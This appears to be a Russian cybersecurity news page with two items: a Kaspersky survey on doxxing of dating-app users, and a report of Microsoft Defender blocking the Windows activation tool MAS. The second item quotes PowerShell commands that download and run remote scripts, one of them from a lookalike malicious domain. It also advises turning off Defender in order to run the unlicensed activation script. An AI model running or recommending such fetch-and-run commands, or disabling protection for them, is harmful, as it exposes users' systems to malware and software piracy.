18% пользователей приложений для знакомств в России стали жертвами доксинга

18% пользователей приложений для знакомств в России стали жертвами доксинга

18% пользователей приложений для знакомств в России стали жертвами доксинга

Аналитики антивирусной компании «Лаборатория Касперского» провели опрос на тему рисков использования сервисов для онлайн-знакомств. Исследование касалось по большей части онлайн-преследования (доксинга).

В итоге специалисты выяснили, что в России 18% пользователей приложений для знакомств сталкивались с преследованием в социальных сетях. Помимо этого, граждане также ощутили на себе шантаж, угрозы опубликовать персональные данные и личные фотографии.

Более того, в некоторых случаях доходило и до преследования в реальной жизни, и до выкладывания скриншотов переписки. Причём опасность исходила не только от тех людей, с которыми жертвы киберсталкинга какое-то время общались в приложении, но и от совсем незнакомых людей.

Эксперты «Лаборатории Касперского» советуют пользователем сервисов для онлайн-знакомств максимально избегать излишней открытости. Ни в коем случае нельзя допускать, чтобы незнакомцы узнали о вас слишком много.

Среди персональных данных, которые могут представлять реальную опасность в руках злоумышленников, исследователи отмечают домашний адрес, место работы, название компании, телефонные номера.

Также в «Лаборатории Касперского» напомнили, что это явление получило имя «доксинг» — когда преступники публикуют в Сети информацию о человеке, чьей репутации они хотят навредить. С доксингом, как оказалось, сталкивается каждый пятый российский пользователь приложений для онлайн-знакомств.

Ещё 12% респондентов заявили, что конкретно они не сталкивались с таким проявлением онлайн-преследования, но знают тех, кто стал его жертвой.

Напомним, на прошлой неделе мы писали о проблеме харрасмента в сфере кибербезопасности. По данным аналитиков, более 30% ИБ-специалистов сталкивались с этим явлением.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru